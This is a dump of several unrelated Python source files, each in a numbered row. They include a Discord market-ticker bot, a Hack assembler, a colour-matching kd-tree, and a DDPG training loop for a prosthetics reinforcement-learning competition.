cfg.set(branch+ 'CORPSE_pi_420_duration', 7./CORPSE_frq/6.)
cfg.set(branch+ 'CORPSE_pi_mod_frq', finit + Nsplit/2.)
cfg.set(branch+ 'CORPSE_pi_amp', 0.363)
cfg.set(branch+ 'CORPSE_pi2_24p3_duration', 24.3/CORPSE_frq/360.)
cfg.set(branch+ 'CORPSE_pi2_m318p6_duration', 318.6/CORPSE_frq/360.)
cfg.set(branch+ 'CORPSE_pi2_384p3_duration', 384.3/CORPSE_frq/360.)
cfg.set(branch+ 'CORPSE_pi2_mod_frq', f_msm1_cntr - mw0)
cfg.set(branch+ 'CORPSE_pi2_amp', 0.55) ###not calibrated
"""
# ### TODO
cfg.set(branch+ 'CORPSE_pi_phase_shift', 104.0)
# ### TODO
cfg.set(branch+ 'CORPSE_pi_center_shift', 0.e-9)
### CORPSE for the full ms=-1 manifold, driven in the center
### (resonant with mI = 0)
CORPSE_frq = 8e6
cfg.set(branch+ 'msm1_CORPSE_pi_60_duration', 1./CORPSE_frq/6.)
cfg.set(branch+ 'msm1_CORPSE_pi_m300_duration', 5./CORPSE_frq/6.)
cfg.set(branch+ 'msm1_CORPSE_pi_420_duration', 7./CORPSE_frq/6.)
cfg.set(branch+ 'msm1_CORPSE_pi_mod_frq', f_msm1_cntr - mw0)
cfg.set(branch+ 'msm1_CORPSE_pi_amp', 0.782)
cfg.set(branch+ 'msm1_CORPSE_pi2_24p3_duration', 24.3/CORPSE_frq/360.)
cfg.set(branch+ 'msm1_CORPSE_pi2_m318p6_duration', 318.6/CORPSE_frq/360.)
cfg.set(branch+ 'msm1_CORPSE_pi2_384p3_duration', 384.3/CORPSE_frq/360.)
cfg.set(branch+ 'msm1_CORPSE_pi2_mod_frq', f_msm1_cntr - mw0)
cfg.set(branch+ 'msm1_CORPSE_pi2_amp', 0.818) ###not calibrated
cfg.set(branch+ 'first_C_revival', 50.90e-6)
### Nitrogen pulses
cfg.set(branch+ 'N_pi_duration', 47.3e-6)
cfg.set(branch+ 'N_pi_amp', 1)
cfg.set(branch+ 'N_pi2_duration', 47.3e-6/2.)
cfg.set(branch+ 'N_pi2_amp', 1)
"""
##############################################################################
##############################################################################
##############################################################################
### DONE
##############################################################################
##############################################################################
##############################################################################
cfg.save_all()
|
8,093 | e239c2089fc6d4ab646c490b6e3de8953cec5634 | from typing import Sequence, Union, Tuple
import kdtree
from colour import Color
AnsiCodeType = Union[str, int, Tuple[int, int, int]]
class ColorPoint(object):
def __init__(self, source: Color, target: Color,
ansi: AnsiCodeType) -> None:
"""
Map source color to target color, stores target
ansi color ans a single int, a sequence of RGB as ints
or markup string.
"""
self.source = source
self.target = target
self.ansi = ansi
def __len__(self) -> int:
"""
>>> cp = ColorPoint(Color('black'), Color('white'), '')
>>> len(cp) == 3
True
"""
return 3
def __getitem__(self, item) -> float:
"""
>>> cp = ColorPoint(Color('#880073'), Color('white'), '')
>>> cp[0] # hue
0.8590686274509803
>>> cp[1] # saturation
1.0
>>> cp[2] # luminance
0.26666666666666666
"""
return self.source.hsl[item]
def __repr__(self) -> str:
return 'ColorPoint({!r} => {!r})'.format(self.source, self.target)
class ColorMatch(object):
def __init__(self) -> None:
self.tree = kdtree.create(dimensions=3)
def add(self, source: Color, target: Color, ansi: AnsiCodeType) -> None:
point = ColorPoint(source, target, ansi)
self.tree.add(point)
def match(self, color: Color) -> ColorPoint:
"""
>>> cm = ColorMatch()
>>> cm.add(Color('red'), Color('white'), '')
>>> cm.add(Color('blue'), Color('white'), '')
>>> cm.match(Color('yellow'))
ColorPoint(<Color red> => <Color white>)
"""
results = self.tree.search_nn(color.hsl)
if not results:
raise KeyError('No match found for color: {}'.format(color))
return results[0].data
|
8,094 | e57109f1c5c2e1468ef1cf9f10fba743633ca150 | from discord.ext import commands, tasks
from discord.utils import get
import discord
import re
import json
import time
import random
import asyncio
import os
import datetime
from live_ticker_scrape import wrangle_data
from tokens import dev, dev1, es, nas, dow, us10y, dollar, vix, btc, eth, silver , link
es_bot = discord.Client()
nas_bot = discord.Client()
dow_bot = discord.Client()
us10y_bot = discord.Client()
vix_bot = discord.Client()
ticker_vix = discord.Client()
dollar_bot = discord.Client()
silver_bot = discord.Client()
btc_bot = discord.Client()
eth_bot= discord.Client()
link_bot = discord.Client()
loop = asyncio.get_event_loop()
@es_bot.event
async def on_ready():
print('es started')
@nas_bot.event
async def on_ready():
print('nas started')
@dow_bot.event
async def on_ready():
print('dow started')
@silver_bot.event
async def on_ready():
print('silver started')
@us10y_bot.event
async def on_ready():
print('us10y started')
@dollar_bot.event
async def on_Ready():
print('dollar started')
@vix_bot.event
async def on_ready():
print('vix started')
@btc_bot.event
async def on_ready():
print('btc started')
@eth_bot.event
async def on_ready():
print('eth started')
@link_bot.event
async def on_ready():
print('link started')
'''
@tasks.loop() can be changed to seconds, minutes, hours
https://discordpy.readthedocs.io/en/latest/ext/tasks/
'''
@tasks.loop(seconds=5)
async def called_second():
## get all guild ids that the bot is joined in
data = wrangle_data()
print(data)
ticker_es = data['es']
ticker_nas = data['nas']
ticker_dow = data['dow']
ticker_vix = data['vix']
ticker_us10y = data['us10y']
ticker_dollar = data['dxy']
ticker_silver = data['silver']
ticker_btc = data['btc']
ticker_eth = data['eth']
ticker_link = data['link']
## es
if ticker_es:
guild_ids = [guild.id for guild in es_bot.guilds]
name_es = '{:20,.2f}'.format(ticker_es['last'])
watching_es = ticker_es['change%']
guild_channels = [es_bot.get_guild(guild_id) for guild_id in guild_ids]
for guild_channel in guild_channels:
try:
red = get(guild_channel.roles, name='RED')
green = get(guild_channel.roles, name='GREEN')
if "-" in watching_es:
discord_bot = guild_channel.me
await discord_bot.remove_roles(green)
await discord_bot.add_roles(red)
else:
discord_bot = guild_channel.me
await discord_bot.remove_roles(red)
await discord_bot.add_roles(green)
await guild_channel.me.edit(nick=f"1) {name_es}")
await es_bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=f"ES {watching_es}"))
except:
print(f'broke in {guild_channel}')
else:
print('no es data')
##nas
if ticker_nas:
guild_ids = [guild.id for guild in nas_bot.guilds]
name_nas = '{:20,.2f}'.format(ticker_nas['last'])
watching_nas= ticker_nas['change%']
guild_channels = [nas_bot.get_guild(guild_id) for guild_id in guild_ids]
for guild_channel in guild_channels:
try:
red = get(guild_channel.roles, name='RED')
green = get(guild_channel.roles, name='GREEN')
if "-" in watching_nas:
discord_bot = guild_channel.me
await discord_bot.remove_roles(green)
await discord_bot.add_roles(red)
else:
discord_bot = guild_channel.me
await discord_bot.remove_roles(red)
await discord_bot.add_roles(green)
await guild_channel.me.edit(nick=f"2) {name_nas}")
await nas_bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=f"NQ {watching_nas}"))
except:
print(f'broke in {guild_channel}')
else:
print('no nas data')
## dow
if ticker_dow:
guild_ids = [guild.id for guild in dow_bot.guilds]
name_dow = '{:20,.2f}'.format(ticker_dow['last'])
watching_dow = ticker_dow['change%']
guild_channels = [dow_bot.get_guild(guild_id) for guild_id in guild_ids]
for guild_channel in guild_channels:
try:
red = get(guild_channel.roles, name='RED')
green = get(guild_channel.roles, name='GREEN')
if "-" in watching_dow:
discord_bot = guild_channel.me
await discord_bot.remove_roles(green)
await discord_bot.add_roles(red)
else:
discord_bot = guild_channel.me
await discord_bot.remove_roles(red)
await discord_bot.add_roles(green)
await guild_channel.me.edit(nick=f"3) {name_dow}")
await dow_bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=f"DJI {watching_dow}"))
except:
print(f'broke in {guild_channel}')
else:
print('no dow data')
## vix
if vix:
guild_ids = [guild.id for guild in vix_bot.guilds]
name_vix = '{:20,.2f}'.format(ticker_vix['last'])
watching_vix = ticker_vix['change%']
guild_channels = [vix_bot.get_guild(guild_id) for guild_id in guild_ids]
for guild_channel in guild_channels:
try:
red = get(guild_channel.roles, name='RED')
green = get(guild_channel.roles, name='GREEN')
if "-" in watching_vix:
discord_bot = guild_channel.me
await discord_bot.remove_roles(green)
await discord_bot.add_roles(red)
else:
discord_bot = guild_channel.me
await discord_bot.remove_roles(red)
await discord_bot.add_roles(green)
await guild_channel.me.edit(nick=f"4) {name_vix}")
await vix_bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=f"VIX {watching_vix}"))
except:
print(f'broke in {guild_channel}')
else:
print('no vix data ')
# dollar
if ticker_dollar:
guild_ids = [guild.id for guild in dollar_bot.guilds]
name_dollar = '{:20,.2f}'.format(ticker_dollar['last'])
watching_dollar = ticker_dollar['change%']
guild_channels = [dollar_bot.get_guild(guild_id) for guild_id in guild_ids]
for guild_channel in guild_channels:
try:
red = get(guild_channel.roles, name='RED')
green = get(guild_channel.roles, name='GREEN')
if "-" in watching_dollar:
discord_bot = guild_channel.me
await discord_bot.remove_roles(green)
await discord_bot.add_roles(red)
else:
discord_bot = guild_channel.me
await discord_bot.remove_roles(red)
await discord_bot.add_roles(green)
await guild_channel.me.edit(nick=f"5) {name_dollar}")
await dollar_bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=f"DXY {watching_dollar}"))
except:
print(f'broke in {guild_channel}')
else:
print('no dollar data')
# us10y
if ticker_us10y:
guild_ids = [guild.id for guild in us10y_bot.guilds]
name_us10y = '{:20,.2f}'.format(ticker_us10y['last'])
watching_us10y = ticker_us10y['change%']
guild_channels = [us10y_bot.get_guild(guild_id) for guild_id in guild_ids]
for guild_channel in guild_channels:
try:
red = get(guild_channel.roles, name='RED')
green = get(guild_channel.roles, name='GREEN')
if "-" in watching_us10y:
discord_bot = guild_channel.me
await discord_bot.remove_roles(green)
await discord_bot.add_roles(red)
else:
discord_bot = guild_channel.me
await discord_bot.remove_roles(red)
await discord_bot.add_roles(green)
await guild_channel.me.edit(nick=f"4) {name_us10y}")
await us10y_bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=f"US10Y {watching_us10y}"))
except:
print(f'broke in {guild_channel}')
else:
print('no us10y data')
# silver
if ticker_silver:
guild_ids = [guild.id for guild in silver_bot.guilds]
name_silver = '{:20,.2f}'.format(ticker_silver['last'])
watching_silver = ticker_silver['change%']
guild_channels = [silver_bot.get_guild(guild_id) for guild_id in guild_ids]
for guild_channel in guild_channels:
try:
red = get(guild_channel.roles, name='RED')
green = get(guild_channel.roles, name='GREEN')
if "-" in watching_silver:
discord_bot = guild_channel.me
await discord_bot.remove_roles(green)
await discord_bot.add_roles(red)
else:
discord_bot = guild_channel.me
await discord_bot.remove_roles(red)
await discord_bot.add_roles(green)
await guild_channel.me.edit(nick=f"6) {name_silver}")
await silver_bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=f"{ticker_silver['name'].upper()} {watching_silver}"))
except:
print(f'broke in {guild_channel}')
else:
print('no silver data')
#shit coin stuff
# btc
if ticker_btc:
guild_ids = [guild.id for guild in btc_bot.guilds]
name_btc = '{:20,.2f}'.format(ticker_btc['last'])
watching_btc = ticker_btc['change%']
guild_channels = [btc_bot.get_guild(guild_id) for guild_id in guild_ids]
for guild_channel in guild_channels:
try:
red = get(guild_channel.roles, name='RED')
green = get(guild_channel.roles, name='GREEN')
if "-" in watching_btc:
discord_bot = guild_channel.me
await discord_bot.remove_roles(green)
await discord_bot.add_roles(red)
else:
discord_bot = guild_channel.me
await discord_bot.remove_roles(red)
await discord_bot.add_roles(green)
await guild_channel.me.edit(nick=f"7) {name_btc}")
await btc_bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=f"BTC {watching_btc}"))
except:
print(f'broke in {guild_channel}')
else:
print('no data for btc')
# eth
if ticker_eth:
guild_ids = [guild.id for guild in eth_bot.guilds]
name_eth= '{:20,.2f}'.format(ticker_eth['last'])
watching_eth = ticker_eth['change%']
guild_channels = [eth_bot.get_guild(guild_id) for guild_id in guild_ids]
for guild_channel in guild_channels:
try:
red = get(guild_channel.roles, name='RED')
green = get(guild_channel.roles, name='GREEN')
if "-" in watching_eth:
discord_bot = guild_channel.me
await discord_bot.remove_roles(green)
await discord_bot.add_roles(red)
else:
discord_bot = guild_channel.me
await discord_bot.remove_roles(red)
await discord_bot.add_roles(green)
await guild_channel.me.edit(nick=f"8) {name_eth}")
await eth_bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=f"ETH {watching_eth}"))
except:
print(f'broke in {guild_channel}')
else:
print('nodata for eth')
# link
if ticker_link:
guild_ids = [guild.id for guild in link_bot.guilds]
name_link = '{:20,.2f}'.format(ticker_link['last'])
watching_link = ticker_link['change%']
guild_channels = [link_bot.get_guild(guild_id) for guild_id in guild_ids]
for guild_channel in guild_channels:
try:
red = get(guild_channel.roles, name='RED')
green = get(guild_channel.roles, name='GREEN')
if "-" in watching_link:
discord_bot = guild_channel.me
await discord_bot.remove_roles(green)
await discord_bot.add_roles(red)
else:
discord_bot = guild_channel.me
await discord_bot.remove_roles(red)
await discord_bot.add_roles(green)
await guild_channel.me.edit(nick=f"9) {name_link}")
await link_bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=f"LINK {watching_link}"))
except:
print(f'broke in {guild_channel}')
else:
print('nodata for eth')
print(f'updated ')
@called_second.before_loop
async def before():
await es_bot.wait_until_ready()
await nas_bot.wait_until_ready()
await dow_bot.wait_until_ready()
await vix_bot.wait_until_ready()
await us10y_bot.wait_until_ready()
await dollar_bot.wait_until_ready()
await silver_bot.wait_until_ready()
await btc_bot.wait_until_ready()
await eth_bot.wait_until_ready()
await link_bot.wait_until_ready()
print("Finished waiting")
called_second.start()
async def create_bots():
es_task= loop.create_task(es_bot.start(es))
nas_task = loop.create_task(nas_bot.start(nas))
dow_task = loop.create_task(dow_bot.start(dow))
vix_task = loop.create_task(vix_bot.start(vix))
us10y_task = loop.create_task(us10y_bot.start(us10y))
dollar_task = loop.create_task(dollar_bot.start(dollar))
silver_task = loop.create_task(silver_bot.start(silver))
btc_task = loop.create_task(btc_bot.start(btc))
eth_task = loop.create_task(eth_bot.start(eth))
link_task = loop.create_task(link_bot.start(link))
await es_task
await nas_task
await dow_task
await vix_task
await us10y_task
await dollar_task
await silver_task
await btc_task
await eth_task
await link_task
loop.run_until_complete(create_bots()) |
8,095 | 4ce1e802831f09e503d18fd287cb35400986e3c8 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# auther : xiaojinsong(61627515@qq.com)
parts = ['Is', 'Chicago', 'Not', 'Chicago?']
data = ['ACME', 50, 91.1]
print(' '.join(parts))
def generate_str():
print(','.join(str(d) for d in data))
def sample():
yield 'Is'
yield 'Chicago'
yield 'Not'
yield 'Chicago?'
def combine(source, maxsize):
parts = []
size = 0
for part in source:
parts.append(part)
size += len(part)
if size > maxsize:
yield ''.join(parts)
parts=[]
size = 0
yield ''.join(parts)
if __name__ == '__main__':
generate_str()
text = ','.join(sample())
print(text)
with open('combine.txt', 'w') as f:
for part in combine(sample(), 32768):
f.write(part) |
8,096 | 8439972b4458ba66d98f6a80a82a35576df472a4 | from channels.routing import route
from .consumers import message_consumer
channel_routing = [
route("slack.rtm.message", message_consumer)
] |
8,097 | 11e9e4dd5c9c6158fed40080d4cc221f28a0eba0 | #!/usr/bin/python
import sys
import os
class ParseError(Exception):
pass
def remove_inline_comments(text):
ret = []
in_comment_block = False
p = 0
while True:
if (op := text.find('/*', p)) > 0:
in_comment_block = True
if op != p:
ret.append(text[p:op])
p = op + 2
else:
ret.append(text[p:])
break
if (op := text.find('*/', p)) > 0:
p = op + 2
in_comment_block = False
continue
else:
break
if in_comment_block:
exit(2)
return ''.join(ret)
def remove_comments(contents):
ret = []
for l in contents:
lstrip = l.strip()
if lstrip.startswith('//'):
continue
if (com := lstrip.find('//')) > 0:
ret.append(l[0:com])
continue
ret.append(l)
return ret
class AIns:
def __init__(self, token, symbols):
if token.isdecimal():
self.value = int(token)
if self.value > 2**15-1:
raise ParseError("A instruction value is too high")
elif token in symbols.symbols:
self.value = symbols.symbols[token]
else:
symbols.add(token)
self.value = symbols.symbols[token]
def get_binary(self):
return "0{:015b}".format(self.value)
class CIns:
comp = {
'0': '101010',
'1': '111111',
'-1': '111010',
'D': '001100',
'A': '110000',
'M': '110000',
'!D': '001101',
'!A': '110001',
'!M': '110001',
'-D': '001111',
'-A': '110011',
'-M': '110011',
'D+1': '011111',
'A+1': '110111',
'M+1': '110111',
'D-1': '001110',
'A-1': '110010',
'M-1': '110010',
'D+A': '000010',
'D+M': '000010',
'D-A': '010011',
'D-M': '010011',
'A-D': '000111',
'M-D': '000111',
'D&A': '000000',
'D&M': '000000',
'D|A': '010101',
'D|M': '010101',
}
jmp = {
'JGT': '001',
'JEQ': '010',
'JGE': '011',
'JLT': '100',
'JNE': '101',
'JLE': '110',
'JMP': '111',
}
def __init__(self, token):
self.raw_instruction = token
token = token.replace(' ', '')
self.dest = ''
self.comp = ''
self.jmp = ''
if '=' in token:
self.dest, token = token.split('=', 1)
if ';' in token:
self.comp, self.jmp = token.split(';', 1)
else:
self.comp = token
def get_binary(self):
head = '111'
a='0'
comp = '000000'
dst = ['0', '0', '0']
jmp = '000'
if self.dest:
if len(self.dest) > 3:
raise ParseError('Wrong dest length')
if 'A' in self.dest:
dst[0] = '1'
if 'D' in self.dest:
dst[1] = '1'
if 'M' in self.dest:
dst[2] = '1'
if self.jmp:
try:
jmp = CIns.jmp[self.jmp]
except KeyError:
raise ParseError('Wrong jmp instruction')
try:
comp = CIns.comp[self.comp]
except KeyError:
raise ParseError("Wrong comp instruction")
if 'M' in self.comp:
a = '1'
ret = "{}{}{}{}{}".format(head, a, comp, ''.join(dst), jmp)
if len(ret) > 16:
raise ParseError("CInstruction binary contruction error, command was '{}'".format(self.raw_instruction))
return ret
def parse(contents, symbols):
ret = []
for l in contents:
ls = l.strip()
if ls.startswith('@'):
ret.append(AIns(ls[1:], symbols))
else:
ret.append(CIns(ls))
return ret
class Symbols:
def __init__(self):
self.memptr = 16
self.symbols = {
'R0': 0,
'R1': 1,
'R2': 2,
'R3': 3,
'R4': 4,
'R5': 5,
'R6': 6,
'R7': 7,
'R8': 8,
'R9': 9,
'R10': 10,
'R11': 11,
'R12': 12,
'R13': 13,
'R14': 14,
'R15': 15,
'SCREEN': 16384,
'KBD': 24576,
'SP': 0,
'LCL': 1,
'ARG': 2,
'THIS': 3,
'THAT': 4,
}
def fill_with_labels(self, contents):
ret = []
pos = 0
for l in contents:
ls = l.strip()
if ls.startswith('(') and ls.endswith(')'):
label = ls[1:-1]
if label in self.symbols:
raise ParseError('Label redefinition')
else:
self.symbols[label] = pos
else:
ret.append(l)
pos += 1
return ret
def add(self, symbol):
if symbol in self.symbols:
raise ParseError('Variable redefinition')
self.symbols[symbol] = self.memptr
self.memptr += 1
def main():
if len(sys.argv) < 1:
exit(1)
filename = sys.argv[1]
contents = []
with open(filename) as f:
text = f.read()
contents = (remove_inline_comments(text)).split('\n')
contents = filter(None, remove_comments(contents))
symbols = Symbols()
contents = symbols.fill_with_labels(contents)
parsed = parse(contents, symbols)
out_filename = "{}.hack".format(os.path.splitext(filename)[0])
with open(out_filename, 'w') as f:
for i in parsed:
try:
f.write("{}\n".format(i.get_binary()))
except ParseError as e:
print(e)
exit(1)
if __name__ == "__main__":
main()
|
8,098 | 5f4abc7e9397034737ee214b0d0aae39ebf1548b | #!/usr/bin/env python
# pylama:ignore=E221,E251
from setuptools import find_packages, setup
setup(
name = 'coding_exercises',
version = '1.0',
description = 'Coding Exercises in Python',
author = 'Gustavo Gama',
author_email = 'gustavo.gama@gmail.com',
url = 'https://gama.igenesis.com.br',
packages = find_packages()
)
|
8,099 | 3f92bf194058c97a40cd5728cfc7c9d1be6b2548 | import os
import sys
import time
from collections import deque
import pickle
import random
import string
from tensorflow.python.framework.errors import InvalidArgumentError
from baselines.ddpg.ddpg import DDPG
import baselines.common.tf_util as U
from baselines.ddpg import prosthetics_env
from baselines import logger
import numpy as np
import tensorflow as tf
# https://bitbucket.org/mpi4py/mpi4py/issues/54/example-mpi4py-code-not-working
import mpi4py
mpi4py.rc.recv_mprobe = False
from mpi4py import MPI
import pickle
from pdb import set_trace
import pathlib
import resource
NB_EVAL_EPOCHS=1
NB_EVAL_EPOCH_CYCLES=0
NB_EVAL_STEPS=1001
def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic,
normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise,
popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory,
saved_model_basename, restore_model_name, crowdai_client, crowdai_token,
reward_shaping, feature_embellishment, relative_x_pos, relative_z_pos,
tau=0.01, eval_env=None, param_noise_adaption_interval=50):
rank = MPI.COMM_WORLD.Get_rank()
assert (np.abs(env.action_space.low) == env.action_space.high).all() # we assume symmetric actions.
max_action = env.action_space.high
logger.info('scaling actions by {} before executing in env'.format(max_action))
agent = DDPG(actor, critic, memory, env.observation_space.shape, env.action_space.shape,
gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations,
batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg,
actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm,
reward_scale=reward_scale)
logger.info('Using agent with the following configuration:')
logger.info(str(agent.__dict__.items()))
# Set up logging stuff only for a single worker.
saved_model_dir = 'saved-models/'
if saved_model_basename is None:
saved_model_basename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))
saved_model_path = saved_model_dir + saved_model_basename
if restore_model_name:
restore_model_path = restore_model_name
if not pathlib.Path(restore_model_path+'.index').is_file():
restore_model_path = saved_model_dir + restore_model_name
max_to_keep = 500
eval_reward_threshold_to_keep = 300
saver = tf.train.Saver(max_to_keep=max_to_keep)
adam_optimizer_store = dict()
adam_optimizer_store['actor_optimizer'] = dict()
adam_optimizer_store['critic_optimizer'] = dict()
#eval_episode_rewards_history = deque(maxlen=100)
#episode_rewards_history = deque(maxlen=100)
with U.single_threaded_session() as sess:
try:
if restore_model_name:
logger.info("Restoring from model at", restore_model_path)
#saver.restore(sess, tf.train.latest_checkpoint(model_path))
saver.restore(sess, restore_model_path)
else:
logger.info("Creating new model")
sess.run(tf.global_variables_initializer()) # this should happen here and not in the agent right?
except InvalidArgumentError as exc:
if "Assign requires shapes of both tensors to match." in str(exc):
print("Unable to restore model from {:s}.".format(restore_model_path))
print("Chances are you're trying to restore a model with reward embellishment into an environment without reward embellishment (or vice versa). Unfortunately this isn't supported (yet).")
print(exc.message)
sys.exit()
else:
raise exc
# Prepare everything.
agent.initialize(sess)
sess.graph.finalize()
agent.reset()
# restore adam optimizer
try:
if restore_model_name:
logger.info("Restoring pkl file with adam state", restore_model_path)
#saver.restore(sess, tf.train.latest_checkpoint(model_path))
adam_optimizer_store = pickle.load(open(restore_model_path
+ ".pkl", "rb"))
agent.actor_optimizer.m = adam_optimizer_store['actor_optimizer']['m']
agent.actor_optimizer.v = adam_optimizer_store['actor_optimizer']['v']
agent.actor_optimizer.t = adam_optimizer_store['actor_optimizer']['t']
agent.critic_optimizer.m = adam_optimizer_store['critic_optimizer']['m']
agent.critic_optimizer.v = adam_optimizer_store['critic_optimizer']['v']
agent.critic_optimizer.t = adam_optimizer_store['critic_optimizer']['t']
if 'param_noise' in adam_optimizer_store:
agent.param_noise = adam_optimizer_store['param_noise']
except:
print("Unable to restore adam state from {:s}.".format(restore_model_path))
obs = env.reset()
done = False
episode_reward = 0.
#episode_step = 0
#episodes = 0
#t = 0
#epoch_episode_steps = []
#epoch_episode_eval_rewards = []
#epoch_episode_eval_steps = []
#epoch_start_time = time.time()
#epoch_actions = []
#epoch_episodes = 0
for epoch in range(nb_epochs):
start_time = time.time()
epoch_episode_rewards = []
epoch_qs = []
eval_episode_rewards = []
eval_qs = []
eval_steps = []
epoch_actor_losses = []
epoch_critic_losses = []
worth_keeping = False
for cycle in range(nb_epoch_cycles):
# Perform rollouts.
for t_rollout in range(nb_rollout_steps):
# Predict next action.
action, q = agent.pi(obs, apply_noise=True, compute_Q=True)
assert action.shape == env.action_space.shape
# Execute next action.
if rank == 0 and render:
env.render()
assert max_action.shape == action.shape
#new_obs, r, done, info = env.step(max_action * action) # scale for execution in env (as far as DDPG is concerned, every action is in [-1, 1])
new_obs, r, done, info = env.step(action)
#t += 1
if rank == 0 and render:
env.render()
episode_reward += r
#episode_step += 1
# Book-keeping.
#epoch_actions.append(action)
epoch_qs.append(q)
agent.store_transition(obs, action, r, new_obs, done)
obs = new_obs
if done:
# Episode done.
epoch_episode_rewards.append(episode_reward)
#episode_rewards_history.append(episode_reward)
#epoch_episode_steps.append(episode_step)
episode_reward = 0.
#episode_step = 0
#epoch_episodes += 1
#episodes += 1
agent.reset()
obs = env.reset()
# Train.
#epoch_adaptive_distances = []
for t_train in range(nb_train_steps):
# Adapt param noise, if necessary.
if memory.nb_entries >= batch_size and t_train % param_noise_adaption_interval == 0:
distance = agent.adapt_param_noise()
#epoch_adaptive_distances.append(distance)
cl, al = agent.train()
epoch_critic_losses.append(cl)
epoch_actor_losses.append(al)
agent.update_target_net()
# Submit to crowdai competition. What a hack. :)
#if crowdai_client is not None and crowdai_token is not None and eval_env is not None:
crowdai_submit_count = 0
if crowdai_client is not None and crowdai_token is not None:
eval_obs_dict = crowdai_client.env_create(crowdai_token, env_id="ProstheticsEnv")
eval_obs_dict, eval_obs_projection = prosthetics_env.transform_observation(
eval_obs_dict,
reward_shaping=reward_shaping,
reward_shaping_x=1.,
feature_embellishment=feature_embellishment,
relative_x_pos=relative_x_pos,
relative_z_pos=relative_z_pos)
while True:
action, _ = agent.pi(eval_obs_projection, apply_noise=False, compute_Q=False)
submit_action = prosthetics_env.openai_to_crowdai_submit_action(action)
clipped_submit_action = np.clip(submit_action, 0., 1.)
actions_equal = clipped_submit_action == submit_action
if not np.all(actions_equal):
logger.debug("crowdai_submit_count:", crowdai_submit_count)
logger.debug(" openai-action:", action)
logger.debug(" submit-action:", submit_action)
crowdai_submit_count += 1
[eval_obs_dict, reward, done, info] = crowdai_client.env_step(clipped_submit_action.tolist(), True)
#[eval_obs_dict, reward, done, info] = crowdai_client.env_step(agent.pi(eval_obs_projection, apply_noise=False, compute_Q=False), True)
eval_obs_dict, eval_obs_projection = prosthetics_env.transform_observation(
eval_obs_dict,
reward_shaping=reward_shaping,
reward_shaping_x=1.,
feature_embellishment=feature_embellishment,
relative_x_pos=relative_x_pos,
relative_z_pos=relative_z_pos)
if done:
logger.debug("done: crowdai_submit_count:", crowdai_submit_count)
eval_obs_dict = crowdai_client.env_reset()
if not eval_obs_dict:
break
logger.debug("done: eval_obs_dict exists after reset")
eval_obs_dict, eval_obs_projection = prosthetics_env.transform_observation(
eval_obs_dict,
reward_shaping=reward_shaping,
reward_shaping_x=1.,
feature_embellishment=feature_embellishment,
relative_x_pos=relative_x_pos,
relative_z_pos=relative_z_pos)
crowdai_client.submit()
return # kids, don't try any of these (expedient hacks) at home!
if eval_env:
eval_episode_reward_mean, eval_q_mean, eval_step_mean = evaluate_n_episodes(3, eval_env, agent, nb_eval_steps, render_eval)
if eval_episode_reward_mean >= eval_reward_threshold_to_keep:
worth_keeping = True
mpi_size = MPI.COMM_WORLD.Get_size()
# Log stats.
# XXX shouldn't call np.mean on variable length lists
duration = time.time() - start_time
if nb_epochs and nb_epoch_cycles and nb_train_steps > 0:
#stats = agent.get_stats()
#combined_stats = stats.copy()
combined_stats = {}
combined_stats['train/epoch_episode_reward_mean'] = np.mean(epoch_episode_rewards)
#combined_stats['rollout/return_history'] = np.mean(episode_rewards_history)
#combined_stats['rollout/episode_steps'] = np.mean(epoch_episode_steps)
#combined_stats['rollout/actions_mean'] = np.mean(epoch_actions)
combined_stats['train/epoch_Q_mean'] = np.mean(epoch_qs)
combined_stats['train/epoch_loss_actor'] = np.mean(epoch_actor_losses)
combined_stats['train/epoch_loss_critic'] = np.mean(epoch_critic_losses)
#combined_stats['train/param_noise_distance'] = np.mean(epoch_adaptive_distances)
combined_stats['train/epoch_duration'] = duration
#combined_stats['epoch/steps_per_second'] = float(t) / float(duration)
#combined_stats['total/episodes'] = episodes
#combined_stats['rollout/episodes'] = epoch_episodes
#combined_stats['rollout/actions_std'] = np.std(epoch_actions)
#combined_stats['memory/rss'] = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
else:
combined_stats = {}
# Evaluation statistics.
if eval_env:
combined_stats['eval/epoch_episode_reward_mean'] = eval_episode_reward_mean # np.mean(eval_episode_rewards)
#combined_stats['eval/return_history'] = np.mean(eval_episode_rewards_history)
#combined_stats['eval/epoch_episode_reward_std'] = np.std(eval_episode_rewards)
combined_stats['eval/epoch_Q_mean'] = eval_q_mean # np.mean(eval_qs)
#combined_stats['eval/episodes'] = len(eval_episode_rewards)
combined_stats['eval/steps_mean'] = eval_step_mean # np.mean(eval_steps)
def as_scalar(x):
if isinstance(x, np.ndarray):
assert x.size == 1
return x[0]
elif np.isscalar(x):
return x
else:
raise ValueError('expected scalar, got %s'%x)
combined_stats_sums = MPI.COMM_WORLD.allreduce(np.array([as_scalar(x) for x in combined_stats.values()]))
combined_stats = {k : v / mpi_size for (k,v) in zip(combined_stats.keys(), combined_stats_sums)}
# Total statistics.
#combined_stats['total/epochs'] = epoch + 1
#combined_stats['total/steps'] = t
for key in sorted(combined_stats.keys()):
logger.record_tabular(key, combined_stats[key])
logger.info('')
logger.info('Epoch', epoch)
logger.dump_tabular()
logdir = logger.get_dir()
if worth_keeping and rank == 0 and nb_epochs and nb_epoch_cycles and nb_train_steps and nb_rollout_steps:
logger.info('Saving model to', saved_model_dir + saved_model_basename + '-' + str(epoch))
saver.save(sess, saved_model_path, global_step=epoch, write_meta_graph=False)
